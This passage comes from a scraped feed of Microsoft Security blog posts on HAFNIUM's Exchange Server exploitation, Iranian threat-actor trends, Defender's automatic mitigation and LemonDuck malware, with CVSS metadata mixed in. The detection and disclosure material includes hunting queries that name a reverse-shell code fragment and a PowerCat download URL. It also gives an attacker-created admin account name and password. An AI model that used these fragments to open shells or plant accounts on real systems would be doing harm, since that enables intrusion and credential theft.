Invoke-PowerShellTcpOneLine reverse shell:\n\n\n\n * Downloading PowerCat from GitHub, then using it to open a connection to a remote server:\n\n\n\nHAFNIUM operators were also able to download the Exchange offline address book from compromised systems, which contains information about an organization and its users.\n\nOur blog, [Defending Exchange servers under attack](<https://www.microsoft.com/security/blog/2020/06/24/defending-exchange-servers-under-attack/>), offers advice for improving defenses against Exchange server compromise. Customers can also find additional guidance about web shell attacks in our blog [Web shell attacks continue to rise.](<https://www.microsoft.com/security/blog/2021/02/11/web-shell-attacks-continue-to-rise/>)\n\n## Can I determine if I have been compromised by this activity?\n\nThe below sections provide indicators of compromise (IOCs), detection guidance, and advanced hunting queries to help customers investigate this activity using Exchange server logs, Azure Sentinel, Microsoft Defender for Endpoint, and Microsoft 365 Defender. We encourage our customers to conduct investigations and implement proactive detections to identify possible prior campaigns and prevent future campaigns that may target their systems.\n\n### Check patch levels of Exchange Server\n\nThe Microsoft Exchange Server team has published a [blog post on these new Security Updates](<https://techcommunity.microsoft.com/t5/exchange-team-blog/released-march-2021-exchange-server-security-updates/ba-p/2175901>) providing a script to get a quick inventory of the patch-level status of on-premises Exchange servers and answer some basic questions around installation of these patches.\n\n### Scan Exchange log files for indicators of compromise\n\nThe Exchange Server team has created a script to run a check for HAFNIUM IOCs to address performance and memory concerns. That script is available here: <https://github.com/microsoft/CSS-Exchange/tree/main/Security>.\n\n * CVE-2021-26855 exploitation can be detected via the following Exchange HttpProxy logs: \n * These logs are located in the following directory: %PROGRAMFILES%\\Microsoft\\Exchange Server\\V15\\Logging\\HttpProxy\n * Exploitation can be identified by searching for log entries where the AuthenticatedUser is empty and the AnchorMailbox contains the pattern of ServerInfo~*/* \n * Here is an example PowerShell command to find these log entries:\n\n`Import-Csv -Path (Get-ChildItem -Recurse -Path \"$env:PROGRAMFILES\\Microsoft\\Exchange Server\\V15\\Logging\\HttpProxy\" -Filter '*.log').FullName | Where-Object { $_.AnchorMailbox -like 'ServerInfo~*/*' -or $_.BackEndCookie -like 'Server~*/*~*'} | select DateTime, AnchorMailbox, UrlStem, RoutingHint, ErrorCode, TargetServerVersion, BackEndCookie, GenericInfo, GenericErrors, UrlHost, Protocol, Method, RoutingType, AuthenticationType, ServerHostName, HttpStatus, BackEndStatus, UserAgent`\n\n * * If activity is detected, the logs specific to the application specified in the AnchorMailbox path can be used to help determine what actions were taken. \n * These logs are located in the %PROGRAMFILES%\\Microsoft\\Exchange Server\\V15\\Logging directory.\n * CVE-2021-26858 exploitation can be detected via the Exchange log files: \n * C:\\Program Files\\Microsoft\\Exchange Server\\V15\\Logging\\OABGeneratorLog\n * Files should only be downloaded to the %PROGRAMFILES%\\Microsoft\\Exchange Server\\V15\\ClientAccess\\OAB\\Temp directory \n * In case of exploitation, files are downloaded to other directories (UNC or local paths)\n * Windows command to search for potential exploitation:\n\n`findstr /snip /c:\"Download failed and temporary file\" \"%PROGRAMFILES%\\Microsoft\\Exchange Server\\V15\\Logging\\OABGeneratorLog\\*.log\"`\n\n * CVE-2021-26857 exploitation can be detected via the Windows Application event logs \n * Exploitation of this deserialization bug will create Application events with the following properties: \n * Source: MSExchange Unified Messaging\n * EntryType: Error\n * Event Message Contains: System.InvalidCastException\n * Following is PowerShell command to query the Application Event Log for these log entries:\n\n`Get-EventLog -LogName Application -Source \"MSExchange Unified Messaging\" -EntryType Error | Where-Object { $_.Message -like \"*System.InvalidCastException*\" }`\n\n * CVE-2021-27065 exploitation can be detected via the following Exchange log files: \n * C:\\Program Files\\Microsoft\\Exchange Server\\V15\\Logging\\ECP\\Server\n\nAll Set-<AppName>VirtualDirectory properties should never contain script. InternalUrl and ExternalUrl should only be valid Uris.\n\n * * Following is a PowerShell command to search for _potential_ exploitation:\n\n`Select-String -Path \"$env:PROGRAMFILES\\Microsoft\\Exchange Server\\V15\\Logging\\ECP\\Server\\*.log\" -Pattern 'Set-.+VirtualDirectory'`\n\n## Host IOCs\n\nMicrosoft is releasing a feed of observed indicators of compromise (IOCs) in related attacks. This feed is available in both [CSV](<https://raw.githubusercontent.com/Azure/Azure-Sentinel/master/Sample%20Data/Feeds/MSTICIoCs-ExchangeServerVulnerabilitiesDisclosedMarch2021.csv>) and [JSON](<https://raw.githubusercontent.com/Azure/Azure-Sentinel/master/Sample%20Data/Feeds/MSTICIoCs-ExchangeServerVulnerabilitiesDisclosedMarch2021.json>) formats. This information is being shared as TLP:WHITE.\n\n### Hashes\n\nWeb shell hashes\n\n * b75f163ca9b9240bf4b37ad92bc7556b40a17e27c2b8ed5c8991385fe07d17d0\n * 097549cf7d0f76f0d99edf8b2d91c60977fd6a96e4b8c3c94b0b1733dc026d3e\n * 2b6f1ebb2208e93ade4a6424555d6a8341fd6d9f60c25e44afe11008f5c1aad1\n * 65149e036fff06026d80ac9ad4d156332822dc93142cf1a122b1841ec8de34b5\n * 511df0e2df9bfa5521b588cc4bb5f8c5a321801b803394ebc493db1ef3c78fa1\n * 4edc7770464a14f54d17f36dc9d0fe854f68b346b27b35a6f5839adf1f13f8ea\n * 811157f9c7003ba8d17b45eb3cf09bef2cecd2701cedb675274949296a6a183d\n * 1631a90eb5395c4e19c7dbcbf611bbe6444ff312eb7937e286e4637cb9e72944\n\n### Paths\n\nWe observed web shells in the following paths:\n\n * _C:\\inetpub\\wwwroot\\aspnet_client\\_\n * _C:\\inetpub\\wwwroot\\aspnet_client\\system_web\\_\n * _In Microsoft Exchange Server installation paths such as:_\n * _%PROGRAMFILES%\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\_\n * _C:\\Exchange\\FrontEnd\\HttpProxy\\owa\\auth\\_\n\nThe web shells we detected had the following file names:\n\n * _web.aspx_\n * _help.aspx_\n * _document.aspx_\n * _errorEE.aspx_\n * _errorEEE.aspx_\n * _errorEW.aspx_\n * _errorFF.aspx_\n * _healthcheck.aspx_\n * _aspnet_www.aspx_\n * _aspnet_client.aspx_\n * _xx.aspx_\n * _shell.aspx_\n * _aspnet_iisstart.aspx_\n * _one.aspx_\n\n_ _Check for suspicious .zip, .rar, and .7z files in _C:\\ProgramData\\_, which may indicate possible data exfiltration.\n\nCustomers should monitor these paths for LSASS dumps:\n\n * _C:\\windows\\temp\\_\n * _C:\\root\\_\n\n### Tools\n\n * [Procdump](<https://docs.microsoft.com/en-us/sysinternals/downloads/procdump>)\n * [Nishang](<https://github.com/samratashok/nishang>)\n * [PowerCat](<https://github.com/besimorhino/powercat>)\n\nMany of the following detections are for post-breach techniques used by HAFNIUM. So while these help detect some of the specific current attacks that Microsoft has observed it remains very important to apply the recently released updates for CVE-2021-26855, CVE-2021-26857, CVE-2021-27065 and CVE-2021-26858.\n\n## Microsoft Defender Antivirus detections\n\nPlease note that some of these detections are generic detections and not unique to this campaign or these exploits.\n\n * Exploit:Script/Exmann.A!dha\n * Behavior:Win32/Exmann.A\n * Backdoor:ASP/SecChecker.A\n * Backdoor:JS/Webshell _(not unique)_\n * Trojan:JS/Chopper!dha _(not unique)_\n * Behavior:Win32/DumpLsass.A!attk _(not unique)_\n * Backdoor:HTML/TwoFaceVar.B _(not unique)_\n\n## Microsoft Defender for Endpoint detections\n\n * Suspicious Exchange UM process creation\n * Suspicious Exchange UM file creation\n * Possible web shell installation _(not unique)_\n * Process memory dump _(not unique)_\n\n## Azure Sentinel detections\n\n * [HAFNIUM Suspicious Exchange Request](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/W3CIISLog/HAFNIUMSuspiciousExchangeRequestPattern.yaml>)\n * [HAFNIUM UM Service writing suspicious file](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/HAFNIUMUmServiceSuspiciousFile.yaml>)\n * [HAFNIUM New UM Service Child Process](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/SecurityEvent/HAFNIUMNewUMServiceChildProcess.yaml>)\n * [HAFNIUM Suspicious UM Service Errors](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/SecurityEvent/HAFNIUMSuspiciousIMServiceError.yaml>)\n * [HAFNIUM Suspicious File Downloads](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/htttp_proxy_oab_CL/HAFNIUMSuspiciousFileDownloads.yaml>)\n\n## Advanced hunting queries\n\nTo locate possible exploitation activity related to the contents of this blog, you can run the following [advanced hunting](<https://securitycenter.windows.com/hunting>) queries via Microsoft Defender for Endpoint and Azure Sentinel:\n\n### Microsoft Defender for Endpoint advanced hunting queries\n\nMicrosoft 365 Defender customers can find related hunting queries below or at this GitHub location: [https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries/ ](<https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries/>)\n\nAdditional queries and information are available via [_Threat Analytics portal_](<https://securitycenter.windows.com/threatanalytics3/>) for Microsoft Defender customers.\n\n**UMWorkerProcess.exe in Exchange creating abnormal content**\n\nLook for Microsoft Exchange Server\u2019s Unified Messaging service creating non-standard content on disk, which could indicate web shells or other malicious content, suggesting exploitation of CVE-2021-26858 vulnerability:\n\n`DeviceFileEvents | where InitiatingProcessFileName == \"UMWorkerProcess.exe\" | where FileName != \"CacheCleanup.bin\" | where FileName !endswith \".txt\" | where FileName !endswith \".LOG\" | where FileName !endswith \".cfg\" | where FileName != \"cleanup.bin\"`\n\n**UMWorkerProcess.exe spawning**\n\nLook for Microsoft Exchange Server\u2019s Unified Messaging service spawning abnormal subprocesses, suggesting exploitation of CVE-2021-26857 vulnerability:\n\n`DeviceProcessEvents | where InitiatingProcessFileName == \"UMWorkerProcess.exe\" | where FileName != \"wermgr.exe\" | where FileName != \"WerFault.exe\"`\n\nPlease note excessive spawning of wermgr.exe and WerFault.exe could be an indicator of compromise due to the service crashing during deserialization.\n\n### Azure Sentinel advanced hunting queries\n\nAzure Sentinel customers can find a Sentinel query containing these indicators in the Azure Sentinel Portal or at this GitHub location: <https://github.com/Azure/Azure-Sentinel/tree/master/Detections/MultipleDataSources/>.\n\nLook for Nishang Invoke-PowerShellTcpOneLine in Windows Event Logging:\n\n`SecurityEvent | where EventID == 4688 | where Process has_any (\"powershell.exe\", \"PowerShell_ISE.exe\") | where CommandLine has \"$client = New-Object System.Net.Sockets.TCPClient\"`\n\nLook for downloads of PowerCat in cmd and Powershell command line logging in Windows Event Logs:\n\n`SecurityEvent | where EventID == 4688 | where Process has_any (\"cmd.exe\", \"powershell.exe\", \"PowerShell_ISE.exe\") | where CommandLine has \"https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1\"`\n\nLook for Exchange PowerShell Snapin being loaded. This can be used to export mailbox data, subsequent command lines should be inspected to verify usage:\n\n`SecurityEvent | where EventID == 4688 | where Process has_any (\"cmd.exe\", \"powershell.exe\", \"PowerShell_ISE.exe\") | where isnotempty(CommandLine) | where CommandLine contains \"Add-PSSnapin Microsoft.Exchange.Powershell.Snapin\" | summarize FirstSeen = min(TimeGenerated), LastSeen = max(TimeGenerated) by Computer, Account, CommandLine`\n\n \n\nThe post [HAFNIUM targeting Exchange Servers with 0-day exploits](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>) appeared first on [Microsoft Security.", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-02T21:07:53", "type": "mssecure", "title": "HAFNIUM targeting Exchange Servers with 0-day exploits", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-02T21:07:53", "id": "MSSECURE:28641FE2F73292EB4B26994613CC882B", "href": "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-19T19:09:58", "description": "Over the past year, the Microsoft Threat Intelligence Center (MSTIC) has observed a gradual evolution of the tools, techniques, and procedures employed by malicious network operators based in Iran. At [CyberWarCon 2021](<https://www.cyberwarcon.com/>), MSTIC analysts presented their analysis of these trends in Iranian nation state actor activity during a session titled \u201c_The Iranian evolution: Observed changes in Iranian malicious network operations_\u201d. This blog is intended to summarize the content of that research and the topics covered in their presentation and demonstrate MSTIC\u2019s ongoing efforts to track these actors and protect customers from the related threats.\n\nMSTIC consistently tracks threat actor activity, including the groups discussed in this blog, and works across Microsoft Security products and services to build detections into our products that improve customer protections. We are sharing this blog today so that others in the community can also be aware of the latest techniques we have observed being used by Iranian actors.\n\nAs with any observed nation-state actor activity, Microsoft has directly notified customers that have been targeted or compromised, providing them with the information they need to help secure their accounts. Microsoft uses DEV-#### designations as a temporary name given to an unknown, emerging, or a developing cluster of threat activity, allowing MSTIC to track it as a unique set of information until we reach a high confidence about the origin or identity of the actor behind the activity. Once it meets the criteria, a DEV is converted to a named actor.\n\nThree notable trends in Iranian nation-state operators have emerged:\n\n * They are increasingly utilizing ransomware to either collect funds or disrupt their targets.\n * They are more patient and persistent while engaging with their targets.\n * While Iranian operators are more patient and persistent with their social engineering campaigns, they continue to employ aggressive brute force attacks on their targets.\n\n## Ransomware\n\nSince September 2020, MSTIC has observed six Iranian threat groups deploying ransomware to achieve their strategic objectives. These ransomware deployments were launched in waves every six to eight weeks on average.\n\n\n\n_Figure 1: Timeline of ransomware attacks by Iranian threat actors_\n\nIn one observed campaign, PHOSPHORUS targeted the Fortinet FortiOS SSL VPN and unpatched on-premises Exchange Servers globally with the intent of deploying ransomware on vulnerable networks. A recent blog post by the [DFIR Report](<https://thedfirreport.com/2021/11/15/exchange-exploit-leads-to-domain-wide-ransomware/>) describes a similar intrusion in which actors leveraged vulnerabilities in on-premise Exchange Servers to compromise a victim environment and encrypt systems via BitLocker. MSTIC also attributes this activity to PHOSPHORUS. PHOSPHORUS operators conducted widespread scanning and ransomed targeted systems through a five-step process: Scan, Exploit, Review, Stage, Ransom.\n\n### Scan\n\nIn the early part of 2021, PHOSPHORUS actors scanned millions of IPs on the internet for Fortinet FortiOS SSL VPN that were vulnerable to [CVE-2018-13379](<https://www.fortiguard.com/psirt/FG-IR-18-384>). This vulnerability allowed the attackers to collect clear-text credentials from the sessions file on vulnerable Fortinet VPN appliances. The actors collected credentials from over 900 Fortinet VPN servers in the United States, Europe, and Israel so far this year. In the last half of 2021, PHOSPHORUS shifted to scanning for unpatched on-premises Exchange Servers vulnerable to ProxyShell ([CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065](<https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server/>)).\n\n### Exploit\n\nWhen they identified vulnerable servers, PHOSPHORUS sought to gain persistence on the target systems. In some instances, the actors downloaded a Plink runner named _MicrosoftOutLookUpdater.exe_. This file would beacon periodically to their C2 servers via SSH, allowing the actors to issue further commands. Later, the actors would download a custom implant via a Base64-encoded PowerShell command. This implant established persistence on the victim system by modifying startup registry keys and ultimately functioned as a loader to download additional tools.\n\n### Review\n\nAfter gaining persistence, PHOSPHORUS actors triaged hundreds of victims to determine which of them were fitting for actions on objectives. On select victims, operators created local administrator accounts with a with a username of \u201chelp\u201d and password of \u201c_AS_@1394\u201d via the commands below. On occasion, actors dumped LSASS to acquire credentials to be used later for lateral movement.\n\n\n\n### Stage and Ransom\n\nFinally, MSTIC observed PHOSPHORUS employing BitLocker to encrypt data and ransom victims at several targeted organizations. BitLocker is a full volume encryption feature meant to be used for legitimate purposes. After compromising the initial server (through vulnerable VPN or Exchange Server), the actors moved laterally to a different system on the victim network to gain access to higher value resources. From there, they deployed a script to encrypt the drives on multiple systems. Victims were instructed to reach out to a specific Telegram page to pay for the decryption key.\n\n\n\n## Patience and persistence\n\nMSTIC has observed PHOSPHORUS threat actors employing social engineering to build rapport with their victims before targeting them. These operations likely required significant investment in the operator\u2019s time and resources to refine and execute. This trend indicates PHOSPHORUS is either moving away from or expanding on their past tactics of sending unsolicited links and attachments in spear-phishing email campaigns to attempt credential theft.\n\n### PHOSHORUS \u2013 Patient and persistent\n\nPHOSPHORUS sends \u201cinterview requests\u201d to target individuals through emails that contain tracking links to confirm whether the user has opened the file. Once a response is received from the target user, PHOSPHORUS attackers send a link to a benign list of interview questions hosted on a cloud service provider. The attackers continue with several back-and-forth conversations discussing the questions with the target user before finally sending a meeting invite with a link masquerading as a Google Meeting.\n\nOnce the meeting invite is sent, the attackers continuously reach out to the target user, asking them to test the Google Meeting link. The attackers contact the targeted user multiple times per day, continuously pestering them to click the link. The attackers even go so far as to offer to call the target user to walk them through clicking the link. The attackers are more than willing to troubleshoot any issues the user has signing into the fake Google Meeting link, which leads to a credential harvesting page.\n\nMSTIC has observed PHOSPHORUS operators become very aggressive in their emails after the initial lure is sent, to the point where they are almost demanding a response from the targeted user.\n\n### CURIUM \u2013 In it for the long run\n\nCURIUM is another Iranian threat actor group that has shown a great deal of patience when targeting users. Instead of phishing emails, CURIUM actors leverage a network of fictitious social media accounts to build trust with targets and deliver malware.\n\nThese attackers have followed the following playbook:\n\n * Masquerade as an attractive woman on social media\n * Establish a connection via social media with a target user via LinkedIn, Facebook, etc.\n * Chat with the target daily\n * Send benign videos of the woman to the target to prime them to lower their guard\n * Send malicious files to the target similar the benign files previously sent\n * Request that the target user open the malicious document\n * Exfiltrate data from the victim machine\n\nThe process above can take multiple months from the initial connection to the delivery of the malicious document. The attackers build a relationship with target users over time by having constant and continuous communications which allows them to build trust and confidence with the target. In many of the cases we have observed, the targets genuinely believed that they were making a human connection and not interacting with a threat actor operating from Iran.\n\nBy exercising patience, building relationships, and pestering targets continuously once a relationship has been formed, Iranian threat actors have had more success in compromising their targets.\n\n## Brute force\n\nIn 2021, MSTIC observed DEV-0343 aggressively targeting Office 365 tenants via an ongoing campaign of password spray attacks. DEV-0343 is a threat actor MSTIC assesses to be likely operating in support of Iranian interests. MSTIC has [blogged about DEV-0343 activity previously](<https://www.microsoft.com/security/blog/2021/10/11/iran-linked-dev-0343-targeting-defense-gis-and-maritime-sectors/>).\n\nAnalysis of Office 365 logs suggests that DEV-0343 is using a red team tool like [o365spray](<https://github.com/0xZDH/o365spray>) to conduct these attacks.\n\nTargeting in this DEV-0343 activity has been observed across defense companies that support United States, European Union, and Israeli government partners producing military-grade radars, drone technology, satellite systems, and emergency response communication systems. Further activity has targeted customers in geographic information systems (GIS), spatial analytics, regional ports of entry in the Persian Gulf, and several maritime and cargo transportation companies with a business focus in the Middle East.\n\nAs we discussed in our previous blog, DEV-0343 operators\u2019 \u2018pattern of life\u2019 is consistent with the working schedule of actors based in Iran. DEV-0343 operator activity peaked Sunday through Thursday between 04:00:00 and 16:00:00 UTC.\n\n\n\n_Figure 2: DEV-0343 observed operating hours in UTC_\n\n\n\n_Figure 3: DEV-0343 observed actor requests per day_\n\nKnown DEV-0343 operators have also been observed targeting the same account on the same tenant being targeted by other known Iranian operators. For example, EUROPIUM operators attempted to access a specific account on June 12, 2021 and ultimately gained access to this account on June 13, 2021. DEV-0343 was then observed targeting this same account within minutes of EUROPIUM operators gaining access to it the same day. MSTIC assesses that these observed overlapping activities suggest a coordination between different Iranian actors pursuing common objectives.\n\n## Closing thoughts: Increasingly capable threat actors\n\nAs Iranian operators have adapted both their strategic goals and tradecraft, over time they have evolved into more competent threat actors capable of conducting a full spectrum of operations including:\n\n * Information operations\n * Disruption and destruction\n * Support to physical operations\n\nSpecifically, Iranian operators have proven themselves to be both willing and able to:\n\n * Deploy ransomware\n * Deploy disk wipers\n * Deploy mobile malware\n * Conduct phishing attacks\n * Conduct password spray attacks\n * Conduct mass exploitation attacks\n * Conduct supply chain attacks\n * Cloak C2 communications behind legitimate cloud services\n\nMSTIC thanks CyberWarCon 2021 for the opportunity to present this research to the broader security community. Microsoft will continue to monitor all this activity by Iranian actors and implement protections for our customers.\n\n \n\nThe post [Evolving trends in Iranian threat actor activity \u2013 MSTIC presentation at CyberWarCon 2021](<https://www.microsoft.com/security/blog/2021/11/16/evolving-trends-in-iranian-threat-actor-activity-mstic-presentation-at-cyberwarcon-2021/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-16T16:00:08", "type": "mssecure", "title": "Evolving trends in Iranian threat actor activity \u2013 MSTIC presentation at CyberWarCon 2021", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-11-16T16:00:08", "id": "MSSECURE:C0F4687B18D53FB9596AD4FDF77092D8", "href": "https://www.microsoft.com/security/blog/2021/11/16/evolving-trends-in-iranian-threat-actor-activity-mstic-presentation-at-cyberwarcon-2021/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-19T21:46:45", "description": "As cybercriminals continue to exploit unpatched on-premises versions of Exchange Server 2013, 2016, and 2019, we continue to actively work with customers and partners to help them secure their environments and respond to associated threats. To date, we have [released a comprehensive Security Update](<https://techcommunity.microsoft.com/t5/exchange-team-blog/released-march-2021-exchange-server-security-updates/ba-p/2175901>), a one-click interim [Exchange On-Premises Mitigation Tool](<https://aka.ms/eomtrelease>) for both current and out-of-support versions of on-premises Exchange Servers, and [step-by-step guidance](<https://aka.ms/exchange-customer-guidance>) to help address these attacks.\n\nToday, we have taken an additional step to further support our customers who are still vulnerable and have not yet implemented the complete security update. With the latest security intelligence update, Microsoft Defender Antivirus and System Center Endpoint Protection will **automatically mitigate** CVE-2021-26855 on any vulnerable Exchange Server on which it is deployed. Customers do not need to take action beyond ensuring they have installed the latest security intelligence update (build **1.333.747.0** or newer), if they do not already have automatic updates turned on.\n\n\n\nThe Exchange security update is still the most comprehensive way to protect your servers from these attacks and others fixed in earlier releases. This interim mitigation is designed to help protect customers while they take the time to implement the latest Exchange Cumulative Update for their version of Exchange.\n\nMicrosoft will provide guidance to our security partners so that they have the option to make available similar, simple mitigations in their products as well.\n\nWe are deeply committed to protecting our customers. To stay up to date please continue to review the content posted at <https://aka.ms/exchangevulns>.\n\n### Frequently Asked Questions\n\n**Q: If I have Microsoft Defender Antivirus installed on my Exchange Server do I need to take any further action to get this mitigation?**\n\nA: Customers that install Microsoft Defender Antivirus and have automatic definition updates enabled (default setting) do not have to take further action to receive the mitigation.\n\n**Q: My organization manages Microsoft Defender Antivirus definition updates. What do I need to do to ensure I have this mitigation?**\n\nA: Customers that manage Microsoft Defender Antivirus definition updates need to select the new detection build (**1.333.747.0 or newer**) and deploy that to the Exchange Server.\n\n**Q: After this mitigation, do I still need to install the security update?**\n\nA: Yes. This automatic mitigation breaks the attack chain by mitigating CVE-2021-26855. Customers should still prioritize getting current on security updates for Exchange Server to comprehensively address the vulnerabilities.\n\n**Q: When does Microsoft Defender Antivirus apply the mitigation?**\n\nA: Microsoft Defender Antivirus will automatically identify if a vulnerable version of Exchange Server is installed and apply the mitigations the first time the security intelligence update is deployed. The mitigation is deployed once per machine.\n\n**Q: Is cloud protection required to receive the mitigation?**\n\nA: No. However, enabling cloud protection is a best practice that will keep you with the most current protections against the ever-changing threat environment. Customers are encouraged to enable cloud protection.\n\n**Q: What can I do if I don\u2019t have Microsoft Defender Antivirus?**\n\nA: Use the One-Click Microsoft Exchange On-Premises Mitigation Tool found [here](<https://msrc-blog.microsoft.com/2021/03/15/one-click-microsoft-exchange-on-premises-mitigation-tool-march-2021/>).\n\nThe post [Automatic on-premises Exchange Server mitigation now in Microsoft Defender Antivirus](<https://www.microsoft.com/security/blog/2021/03/18/automatic-on-premises-exchange-server-mitigation-now-in-microsoft-defender-antivirus/>) appeared first on [Microsoft Security.", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-18T22:00:47", "type": "mssecure", "title": "Automatic on-premises Exchange Server mitigation now in Microsoft Defender Antivirus", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855"], "modified": "2021-03-18T22:00:47", "id": "MSSECURE:FC03200E57A46D16A8CD1A5A0E647BB3", "href": "https://www.microsoft.com/security/blog/2021/03/18/automatic-on-premises-exchange-server-mitigation-now-in-microsoft-defender-antivirus/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-13T21:11:26", "description": "_[Note: In this two-part blog series, we expose a modern malware infrastructure and provide guidance for protecting against the wide range of threats it enables. [Part 1](<https://www.microsoft.com/security/blog/2021/07/22/when-coin-miners-evolve-part-1-exposing-lemonduck-and-lemoncat-modern-mining-malware-infrastructure/>) covered the evolution of the threat, how it spreads, and how it impacts organizations. Part 2 provides a deep dive on the attacker behavior and outlines investigation guidance.] _\n\nLemonDuck is an actively updated and robust malware primarily known for its botnet and cryptocurrency mining objectives. As we discussed in [Part 1](<https://www.microsoft.com/security/blog/2021/07/22/when-coin-miners-evolve-part-1-exposing-lemonduck-and-lemoncat-modern-mining-malware-infrastructure/>) of this blog series, in recent months LemonDuck adopted more sophisticated behavior and escalated its operations. Today, beyond using resources for its traditional bot and mining activities, LemonDuck steals credentials, removes security controls, spreads via emails, moves laterally, and ultimately drops more tools for human-operated activity.\n\nLemonDuck spreads in a variety of ways, but the two main methods are (1) compromises that are either edge-initiated or facilitated by bot implants moving laterally within an organization, or (2) bot-initiated email campaigns. After installation, LemonDuck can generally be identified by a predictable series of automated activities, followed by beacon check-in and monetization behaviors, and then, in some environments, human-operated actions.\n\nIn this blog post, we share our in-depth technical analysis of the malicious actions that follow a LemonDuck infection. These include general and automatic behavior, as well as human-operated actions. We also provide guidance for investigating LemonDuck attacks, as well as mitigation recommendations for strengthening defenses against these attacks.\n\n\n\n_Figure 2. LemonDuck attack chain from the Duck and Cat infrastructures_\n\n## External or human-initialized behavior\n\nLemonDuck activity initiated from external applications \u2013 as against self-spreading methods like malicious phishing mail \u2013 is generally much more likely to begin with or lead to human-operated activity. These activities always result in more invasive secondary malware being delivered in tandem with persistent access being maintained through backdoors. These human-operated activities result in greater impact than standard infections.\n\nIn March and April 2021, various vulnerabilities related to the [ProxyLogon](<https://security.microsoft.com/threatanalytics3/4ef1fbc5-5659-4d9b-b32e-97a694475955/overview>) set of Microsoft Exchange Server exploits were utilized by LemonDuck to install web shells and gain access to outdated systems. Attackers then used this access to launch additional attacks while also deploying automatic LemonDuck components and malware.\n\nIn some cases, the LemonDuck attackers used renamed copies of the official Microsoft Exchange On-Premises Mitigation Tool to remediate the vulnerability they had used to gain access. They did so while maintaining full access to compromised devices and limiting other actors from abusing the same Exchange vulnerabilities.\n\nThis self-patching behavior is in keeping with the attackers\u2019 general desire to remove competing malware and risks from the device. This allows them to limit visibility of the attack to SOC analysts within an organization who might be prioritizing unpatched devices for investigation, or who would overlook devices that do not have a high volume of malware present.\n\nThe LemonDuck operators also make use of many [fileless malware 